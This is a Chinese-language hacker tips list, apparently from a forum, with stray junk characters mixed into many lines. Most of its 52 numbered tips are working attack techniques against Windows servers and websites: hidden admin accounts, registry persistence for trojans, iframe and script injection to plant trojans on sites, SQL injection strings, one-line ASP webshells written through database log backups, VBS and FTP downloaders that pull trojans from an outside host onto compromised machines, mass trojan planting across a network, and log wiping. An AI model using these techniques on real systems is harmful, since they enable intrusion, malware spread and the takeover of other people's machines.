Xp系统修改权限防止病毒或木马等破坏系统,cmd下," T1 i; j+ Y0 s, |- p) @0 J/ x
cacls C:\windows\system32 /G hqw20:R& x# ^% u: b0 o6 p. x6 e' d
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
/ H9 Y5 w' ~0 y3 w9 s3 A恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
+ E3 z. a# w0 X3 E( q* f# X9 b- Q
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
1 u1 l) `( E" D e' _9 v+ C/ i
0 m! |# m# P1 {3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。6 u! z4 A% w. }% L! A
9 ?0 I' \/ {! o" h5 I/ T4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号6 X' J" b8 j; Z3 a" j7 A, G
) S+ B+ B4 x2 q1 T) q8 W5、利用INF文件来修改注册表
0 q; {5 m( j7 V4 u[Version]
4 p k7 @* s2 ~Signature="$CHICAGO$"
; E# }( O1 v$ s3 y- X( z& e[Defaultinstall]. P) W9 E: O: |6 x+ h
addREG=Ating% _; g* X L* {- D
[Ating]- ~) _; L @; ~1 [' s; I
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1". ~, O( P- J0 D% J4 a I
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:, h/ h Q, j2 Y2 h }6 b/ e
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
0 m+ |" I2 Z2 u. [1 C其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
; }/ ]! s6 B. _1 c; {HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
5 h3 U4 h$ U4 a2 qHKEY_CURRENT_CONFIG 简写为 HKCC
* u: j0 j! }- L/ D0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值6 g7 C: \% l9 ]7 |) X9 \/ q
"1"这里代表是写入或删除注册表键值中的具体数据5 C+ \. v& |1 M Q
" i. _% Z$ T6 o1 R- d1 F8 U; S6 e, Q3 N6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
/ F: l4 j% N# `+ q' l4 ]0 S多了一步就是在防火墙里添加个端口,然后导出其键值7 d7 {. ^" S: j8 A& r1 f9 W
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
+ `/ @6 \# {; l! x( ~8 u9 m3 V/ x* j! K- \/ y! ~
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽 t7 ^5 e1 u* E5 r
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
4 M' X2 F4 r; p: u# e) {5 f4 [/ F$ o% s% f$ N( m1 O
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
$ m7 ?, B. B0 Z* q/ N
) M- @" `" ` [5 G6 q9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
; g" y1 C$ K; d% T0 L! f可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ X2 ~, e7 B" x% M: W8 M5 U8 q5 w( p' o! B" _4 T) a
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”$ h( R/ R5 A" B: R4 }# n$ s
0 Y) C9 Z# h3 r& e. u11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
D1 }# g4 V% j用法:xsniff –pass –hide –log pass.txt
+ f, D" X% W/ K: k% u4 p5 u6 R) q& t& b. H+ c
12、google搜索的艺术
8 v7 n4 `3 o/ l; u搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
4 _3 U# h2 {6 N! d1 L/ i5 q9 @或“字符串的语法错误”可以找到很多sql注入漏洞。
8 B# E7 \7 _4 }0 ?, d
1 o, {" D' [$ B$ v# m3 G: t13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。. d" \8 ~+ u- R
' V2 Y$ g2 j# n$ Z- q, c14、cmd中输入 nc –vv –l –p 1987
) F; S( T5 D+ i做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃. J' f, x$ k2 G! n! M1 I7 c' J
8 z% \6 [8 E5 E- ^4 t3 L
15、制作T++木马,先写个ating.hta文件,内容为
8 n: a. R* ^( q1 M, C<script language="VBScript">0 j; X, m5 v9 `4 {1 F/ N1 ^
set wshshell=createobject ("wscript.shell" )! O! \+ d* ]: W5 N+ P, q- g6 A' P
a=wshshell.run("你马的名称",1)
8 o5 V; W& s6 b( H& |window.close# C5 ^7 X, o$ n. [8 }, A% b
</script>
. E& M0 a8 b" O再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 G* Y5 j$ x2 {6 c; h& D' V' x! A& I9 z$ { u4 |
16、搜索栏里输入3 f# C6 R# \( L! L; f" X
关键字%'and 1=1 and '%'='( a# M) _8 ?* h8 ]0 |$ b$ G
关键字%'and 1=2 and '%'='
9 R9 j' D9 ?+ f! ~# _0 a4 e比较不同处 可以作为注入的特征字符& H8 P3 r, a" `. O3 Q1 c7 D) y
5 ]: h/ T' ~* I% @
17、挂马代码<html>
: j t3 W4 f) P& q+ X5 b<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>; p$ n+ g# M' ]4 @$ {4 M% d4 w
</html>& O& x" T \% C/ N; ^4 _
; j. ` H- F/ p; b7 Y& x$ q3 a) {18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
! q- k7 r/ a: U* ~) xnet localgroup administrators还是可以看出Guest是管理员来。3 J. \1 A- L/ w7 c
! A+ C( | h( |# b1 c; T9 K" \19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等, X O- w- z& L* ~. |. o9 |
用法: 安装: instsrv.exe 服务名称 路径
- n# }- V3 Q& l: \$ h4 N卸载: instsrv.exe 服务名称 REMOVE7 n8 }/ m" A7 h
. B$ M2 ?& p8 G: w! ?6 A
$ I+ i+ O2 K! m; m21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
G3 H& B7 I1 Q8 Z I5 _. B不能注入时要第一时间想到%5c暴库。
2 c6 T6 G5 J3 v S( M; n' f9 P: i
4 r/ j( _+ u1 C2 O( B0 ~1 S3 V22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~9 a6 B4 {; N$ h5 `3 Q. D
5 G Q" d; h& N/ z23、缺少xp_cmdshell时
, W$ t5 ^" w& \; n尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'4 r& |' {1 a; a F, u y0 p
假如恢复不成功,可以尝试直接加用户(针对开3389的)& s7 O9 \- p9 N. O" T% j; S$ J9 J
declare @o int; X/ I( K. h* y5 X% N! v- e
exec sp_oacreate 'wscript.shell',@o out" J2 v7 m: Z1 i& u7 n! Q
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员. |: E8 z" G4 S) e
; \4 k- O( h3 r+ N3 z& ^7 ^24.批量种植木马.bat5 I S. a! R2 V2 E
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
( z% |5 H! U. cfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间) b+ h. G3 v2 {" Z
扫描地址.txt里每个主机名一行 用\\开头
) ^2 F* o- Y4 C0 G+ A" F6 p* z2 b' f+ F
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。/ n3 ?3 e g$ [9 a( X2 y- z
! O% J" h. R# H+ Z9 V
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.$ i" K t& E* E/ [
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.! ~2 h4 ]" J0 q5 a# H
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马1 T7 g; U% ^. B
' S2 e1 V# @, N% j
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
7 a& @, `8 P9 s5 y5 F然后用#clear logg和#clear line vty *删除日志
8 T# v7 {; M! S. v, x1 G8 j/ o. ]! t* V# o& X1 N' k8 u4 Q8 _: [+ S- r
28、电脑坏了省去重新安装系统的方法+ N5 g3 w1 p+ w8 g; V# K# O8 u
纯dos下执行,! c+ _6 {* G) \/ K$ l8 e. f5 r p; P4 Y
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
. m( I+ U0 [) K, H! ]: y2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
+ r, z' x) t0 B5 @: q( R
4 u- j* `+ g+ ^* J7 h; [1 c29、解决TCP/IP筛选 在注册表里有三处,分别是:* V* G& O% j I4 d: B& a9 ^
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
8 u7 e0 J! P! \HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip) V! P+ z( d8 z% G( _
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 q% C, Y3 K9 y$ s# w- K) V
分别用9 q% S$ L( [' [
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ c5 @ Q& o# j- Kregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- j6 }4 \- o; pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; Z2 U% i& \: `
命令来导出注册表项6 R" v; M: ]" F! p' U5 ]
然后把三个文件里的EnableSecurityFilters"=dword:00000001, c% R# M9 |7 V: ^
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用8 r1 i5 j: W7 m% Q9 I+ e
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。4 w1 {2 q3 z: b0 x3 z
7 C5 ~. A0 ]/ K30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U; e( G; `. B" j7 O
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3' f+ F6 S; D" S* ~. R% T
% ?' x; t: L `* o/ E
31、全手工打造开3389工具: l6 V, ]# j) u
打开记事本,编辑内容如下:
, r1 i) Y4 b% B, Pecho [Components] > c:\sql
- M0 }2 v* |- J/ mecho TSEnable = on >> c:\sql9 O0 V1 _; G- |) ?; q1 ^
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q) y' |+ x f' T( a) Y- O! q
编辑好后存为BAT文件,上传至肉鸡,执行% S P9 l" A9 i) @9 a
% O# L) C s) R! d$ z" C- \7 Z
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
: e- w( [0 ~+ _! D6 w' \; h& ]4 K: p
33、让服务器重启
# ?8 P& \) \6 F0 \* }写个bat死循环:
6 e* P4 ^7 {6 M5 c! C4 Q8 U@echo off. ^& |3 _' e" e; g: M- P
:loop1
5 }0 Z) F7 j8 N" L {- C4 E# z& y. scls) k: m* m+ l! }" w7 z
start cmd.exe
6 ~: l) @$ ^0 w# [" M! k+ xgoto loop1
( g! I* k$ @( k; R' ]保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
~ j r! C' x) {; `4 k! g. l% X8 d8 Q8 Y* S
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你, y( a% b, n* f% n) |4 C0 r
@echo off
' Z7 A/ t+ c7 O( T& bdate /t >c:/3389.txt
+ Y0 I+ l3 r9 S8 |time /t >>c:/3389.txt; T+ e2 I* U" C) H- ^9 A$ ~/ S# H
attrib +s +h c:/3389.bat
# p9 d( M& e7 R- Y4 N- cattrib +s +h c:/3389.txt
2 [8 q) n! _! Pnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt0 N' ?# t9 i- T' H% }0 J) g
并保存为3389.bat" V9 N+ h0 Z( n# s# i) A
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号; s2 g [1 i/ T& p! _2 d+ `
, T+ H+ J# c/ c7 a9 [35、有时候提不了权限的话,试试这个命令,在命令行里输入:
: ]5 l+ h- ?) zstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
' I7 k% w' a; t$ S& f! Y输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
' E: X% z: R( d. O: {6 [; J+ s
5 w- R; I- l+ U: o* C36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件( X% Q; F' t4 ]( }8 J4 C- }( A$ u4 g
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
2 g2 O0 j# Y, }) P( I4 zecho 你的FTP账号 >>c:\1.bat //输入账号% u( ^! z4 D* N' E; Z& a
echo 你的FTP密码 >>c:\1.bat //输入密码
7 @5 Y, Z( e5 H- |0 i3 M, ?echo bin >>c:\1.bat //登入
* Z! ?+ V/ _/ `2 K, U1 wecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么+ U0 M. h8 e/ y4 {3 s6 g4 q
echo bye >>c:\1.bat //退出+ j; K+ R( _, B$ h* V2 e2 G6 {
然后执行ftp -s:c:\1.bat即可
& r" c2 k1 L8 R6 ?2 c. d- l: @/ r" @( O
37、修改注册表开3389两法0 ~; L g, A; N! r5 o8 t3 g7 N
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
L+ K0 B( [- c( _7 Zecho Windows Registry Editor Version 5.00 >>3389.reg1 z! ~( h- @9 }8 ?, m' u3 ]0 P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
- \& B0 N6 h% W4 O$ j+ F/ Decho "Enabled"="0" >>3389.reg! r% g* @2 x* B" f( r
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows k r1 c/ S% b3 G
NT\CurrentVersion\Winlogon] >>3389.reg
) `6 m3 g r% A7 n& U4 z2 @* X0 A/ z; ?echo "ShutdownWithoutLogon"="0" >>3389.reg# X, V# Z; t5 C5 G2 p
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
% o9 K5 T1 l/ u>>3389.reg2 Y+ y9 F, Q7 }9 `) m1 N% h
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg8 D% x* G3 k8 Y5 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]( B# | m0 b/ d& j" c I2 _; V
>>3389.reg
, C9 E& O5 f+ `& n1 i5 B1 Decho "TSEnabled"=dword:00000001 >>3389.reg& q& J- _; c/ H) ~1 n; k" p4 K0 T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg5 v. R1 }5 f1 l3 N6 S
echo "Start"=dword:00000002 >>3389.reg4 U$ O" L3 u: a2 v. ^$ n7 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]8 ?& I# p2 n9 T% F
>>3389.reg( X/ [9 q8 ~) f1 I* d
echo "Start"=dword:00000002 >>3389.reg. E6 f- a4 d& j
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
1 R+ F; p4 I3 Z- E" @. G% o7 [echo "Hotkey"="1" >>3389.reg
0 }* B- e" ~" Z$ { o1 R& e$ ]2 @- Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ p5 X; n2 _- Z3 c8 Z
Server\Wds\rdpwd\Tds\tcp] >>3389.reg3 L* v/ r8 R8 e8 k ]
echo "PortNumber"=dword:00000D3D >>3389.reg
& U( @% h; a1 P' M1 M, J. jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal X1 @7 [- m1 [ @" I) S
Server\WinStations\RDP-Tcp] >>3389.reg
, m" c5 A, Z# S& S8 c- Vecho "PortNumber"=dword:00000D3D >>3389.reg' D2 j$ `4 J5 p' d4 n. p M
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
7 I3 g/ n5 C0 k/ L(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)" { O* L0 d: h6 L4 U& N& X j+ }/ N
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
8 W$ h- ^# A! l(2)winxp和win2003终端开启8 G4 F2 Z1 W9 S; j8 z( N2 b0 @
用以下ECHO代码写一个REG文件:
% V" @- X, f, Secho Windows Registry Editor Version 5.00>>3389.reg
7 a% e% N! o! i) ?$ R" Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) D( \# a9 R2 T, j3 P' _
Server]>>3389.reg& g& C2 }9 e6 t
echo "fDenyTSConnections"=dword:00000000>>3389.reg
/ `! v+ D, U3 G/ e# H6 k2 x: @& ^" Q$ Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! d: k0 n9 Q& w4 ~7 d, p# T* i: F
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
4 p- M# g: p- [* cecho "PortNumber"=dword:00000d3d>>3389.reg
4 G0 h8 J9 Y; d* U* X! Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, l( f3 w" V" I/ A4 JServer\WinStations\RDP-Tcp]>>3389.reg
& i' O+ y9 T3 d& Becho "PortNumber"=dword:00000d3d>>3389.reg3 t+ @4 x0 i5 h0 D0 Y! u6 g
然后regedit /s 3389.reg del 3389.reg% u- ^5 d" @* Y5 P% y/ Y8 y
XP下不论开终端还是改终端端口都不需重启
& @; W/ a, J- ?5 y2 p- m2 d' p- T* O4 T% c: z
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃# Z N% v$ i" s# P4 E; K! k
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'# Q% y' M1 [) b4 b1 i$ T
0 }3 o" ~$ k# o! n. I39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!: f9 ?7 h( X0 c$ y% j. @
(1)数据库文件名应复杂并要有特殊字符4 V$ ]" `% v0 P9 O
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
! i4 M6 ~1 U% Q: [( |将conn.asp文档中的 v6 O/ V% R, g. C+ X
DBPath = Server.MapPath("数据库.mdb")
" I/ h+ K5 e1 n. h9 fconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath: I5 y: {. ?" U( a2 A. [
- f8 O0 F' p0 r% q! f: Z
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
3 R' {: R; Z0 |, \4 A0 l(3)不放在WEB目录里
2 J# l% C/ q+ A- H" n3 C7 ]( b7 i/ u. d& m& X9 x0 H: Z8 E3 Y
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
$ R l( _# M3 B7 n- O$ |3 j可以写两个bat文件+ D2 N6 U% Q& `5 Q
@echo off; B% i$ E7 k; x/ G5 i H; b
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe' o& G' k. t3 M+ U3 m+ _5 m
@del c:\winnt\system32\query.exe
# V- i9 {) K4 \- F- G@del %SYSTEMROOT%\system32\dllcache\query.exe
) @3 o6 w9 e3 S4 N@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
1 B2 t; q. e3 r! ]5 G: q3 q& }8 l- b" K/ w
@echo off$ t- V$ k: I2 R! s2 x6 A7 V
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe( f2 V, a) F. w" f$ Y' I8 C# g2 e: r
@del c:\winnt\system32\tsadmin.exe
3 `, X6 }* ~# G@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
! S. _; K: \0 Q3 u% l" x8 X/ M+ z3 h) O0 M* w G
41、映射对方盘符* d3 S& f, B7 J: ^6 e
telnet到他的机器上,
# m n& W* J9 h& x- Vnet share 查看有没有默认共享 如果没有,那么就接着运行1 ?" T$ A) {4 |7 @
net share c$=c:* G$ @+ I8 K: H% t/ }8 t
net share现在有c$
. g3 o. I( G, F. s, C% a2 n, U在自己的机器上运行6 D. Y; L* X8 A( l4 N5 `2 k
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K$ f3 r$ J1 A0 V3 ^( V/ z+ k4 A
. f3 G& y" e7 q& l
42、一些很有用的老知识
# N; g# \9 d) w1 {* Jtype c:\boot.ini ( 查看系统版本 )) E; ^) K' ?) B6 }! S5 X
net start (查看已经启动的服务)
, `9 T2 g7 m. B H, Uquery user ( 查看当前终端连接 )
) V2 c$ X3 ?+ d% A" A/ D' ^& S" t# bnet user ( 查看当前用户 )! p& L; E0 ]/ M1 M4 a2 H$ ?6 u# X
net user 用户 密码/add ( 建立账号 )' N/ e- {& u! H- p4 F, r8 z! ?
net localgroup administrators 用户 /add (提升某用户为管理员)
: E" s5 c0 v1 O* K( i) W) Pipconfig -all ( 查看IP什么的 ), \, ~ X- R- \/ y
netstat -an ( 查看当前网络状态 )! l7 O- }1 G) x0 f2 h
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)$ n% x5 I- |; ?2 L% a
克隆时Administrator对应1F4
1 J8 ~& {3 D S2 k! Z; |: Rguest对应1F5! ]: g$ [! D" H) t
tsinternetuser对应3E86 M, a7 q# [ K3 f( B- W: G
/ |5 s& o/ P9 e8 w43、如果对方没开3389,但是装了Remote Administrator Service, {' X* x$ B+ d, _4 `! E/ `0 b* H! H
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接& [. J) R/ ]" ?
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息% R: t+ p' z6 @5 r1 |+ _
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
3 ?5 W) p- K* q5 _6 B7 p6 u- S+ ?3 _# h6 `# ~
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
1 c4 O* P+ U, S9 v本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ t8 E7 E' x* j1 R$ I" a6 Y) p+ K- a/ M% R# I# }% c) s3 f
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)0 R- z( M' p1 g7 }, p7 \( X& y4 m$ ~
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
$ y. [0 J$ U" p* k$ q^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
! u$ q# ~8 ?9 CCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =8 v# I% @9 N8 g: t' R
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs0 @& n7 s7 a+ D% C( p0 l# K
(这是完整的一句话,其中没有换行符)
! Y! A6 K! X0 E然后下载:2 k. I8 U' W+ M: A: G& L+ V
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
+ S; I0 G$ q# t6 L8 Z- E5 O6 {$ q5 ^5 e3 p" i/ N6 X
46、一句话木马成功依赖于两个条件:
7 d( ~2 k7 \* A+ R1、服务端没有禁止adodb.Stream或FSO组件; i2 _0 X, K( W8 o4 N# e
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。& M& Q y G* k3 R0 W ~
& G# x/ y. o2 N47、利用DB_OWNER权限进行手工备份一句话木马的代码:# ^7 P4 Z; f0 d9 r9 z, b. T- b
;alter database utsz set RECOVERY FULL--
1 t9 k* ~# O; n' [;create table cmd (a image)--; x1 V$ x/ h! a( T
;backup log utsz to disk = 'D:\cmd' with init--% [# e0 W% I7 R" u0 {! |7 {
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
# F- ~3 d9 { C;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, a2 N6 N9 f6 J& B. g1 z
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
% } ~- U$ R. H( s; ^0 v# j* S+ j8 h) j1 A& \0 j, E. k. l! H+ L- O0 n
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
, H7 G3 O4 R. Z3 C+ q" w' O9 j# C. t( z- L* z
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
; m9 |% r# L, X5 E" `# v所有会话用 'all'。
+ k1 _4 f9 r( A2 C) c3 @4 e-s sessionid 列出会话的信息。- M5 Q! ~8 P. D
-k sessionid 终止会话。
+ g h6 d% Z! _4 _! b7 y2 T) t-m sessionid 发送消息到会话。' F* q3 ~5 M: d6 L
$ M& u* G6 V/ S& L- @- m1 u, ]) c/ \config 配置 telnet 服务器参数。
& B: N8 _' P( `: }7 \& B8 a2 b2 _. Y- \* W# Z/ ?
common_options 为:
/ c% E5 H3 {" \$ O3 D$ }-u user 指定要使用其凭据的用户) A ^. d) Z7 J" U. M
-p password 用户密码+ U. J0 M! K4 o- U4 W# [ ?
" q; _6 ?+ \ N( V- ^& Sconfig_options 为:
7 I) n" ^3 W* N6 k9 _dom = domain 设定用户的默认域
. q7 p& j# S4 L+ Hctrlakeymap = yes|no 设定 ALT 键的映射' D' M0 h% t7 P2 y% V, B
timeout = hh:mm:ss 设定空闲会话超时值
) P6 B3 a. n6 f) Y. T0 Rtimeoutactive = yes|no 启用空闲会话。
2 n9 ~) V7 R* y! S/ y2 ]6 z) @maxfail = attempts 设定断开前失败的登录企图数。) {8 L7 L d, U
maxconn = connections 设定最大连接数。
( d$ T" z/ `4 `# n$ wport = number 设定 telnet 端口。- C9 ~4 G7 h: p4 H+ M$ [
sec = [+/-]NTLM [+/-]passwd
6 e1 E( R' H8 W$ c/ z设定身份验证机构; J1 b, c0 m- @5 h Y
fname = file 指定审计文件名。" e0 w0 l- H `4 \( o, [
fsize = size 指定审计文件的最大尺寸(MB)。" x5 e# \1 Z" F; [
mode = console|stream 指定操作模式。
; F# o% h* c9 R5 x9 s1 H8 `& K+ B) Jauditlocation = eventlog|file|both
V$ y1 u/ R) W6 X- N7 M指定记录地点, c& h- [ @$ u6 Y
audit = [+/-]user [+/-]fail [+/-]admin g2 \% R7 t8 M/ m6 z
3 Y& b4 w, o! q. @! K' c49、例如:在IE上访问:
2 x( q; S8 e# d& |www.hack520.org/hack.txt就会跳转到http://www.hack520.org/7 n/ l* [5 e. c9 d/ I8 k' \0 _1 ^* W+ Z
hack.txt里面的代码是:
& _% F/ v( T5 [% h9 h2 l" U! X<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">( O* B3 q, k0 H
把这个hack.txt发到你空间就可以了!9 n3 M( Y$ U6 {$ [$ I
这个可以利用来做网马哦!
/ g3 L l, z0 p$ i9 H
4 D# W$ ?& h) ]" t% s50、autorun的病毒可以通过手动限制!
& m6 S; _8 x8 S0 N1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!( S% N: Q' w; v0 u; g: I
2,打开盘符用右键打开!切忌双击盘符~' p: u( b' D) e9 Z
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
8 h; C0 l# R7 k) \5 M5 B: q: T0 Z+ l, ^$ z$ t* M1 p3 _
51、log备份时的一句话木马:! t4 s2 P3 q% O
a).<%%25Execute(request("go"))%%25>
1 \' k8 P- j% x5 U4 X5 X7 mb).<%Execute(request("go"))%>
; s! A6 M1 r& y) W2 oc).%><%execute request("go")%><%
4 ]/ H% I4 G: g" i+ ]/ md).<script language=VBScript runat=server>execute request("sb")</Script>
: U, j: v8 ?% x! ~& Ve).<%25Execute(request("l"))%25>
2 K" p0 m0 E5 ~$ ^( L( Vf).<%if request("cmd")<>"" then execute request("pass")%># g/ W% V7 [. f& t9 q# H8 q
. a, K! T7 t4 v/ s% Y$ |& E52、at "12:17" /interactive cmd
5 S, K; o. s' c% B( X1 ]# z- m# F执行后可以用AT命令查看新加的任务! E6 }+ `' b+ x5 w% F* {$ e; A
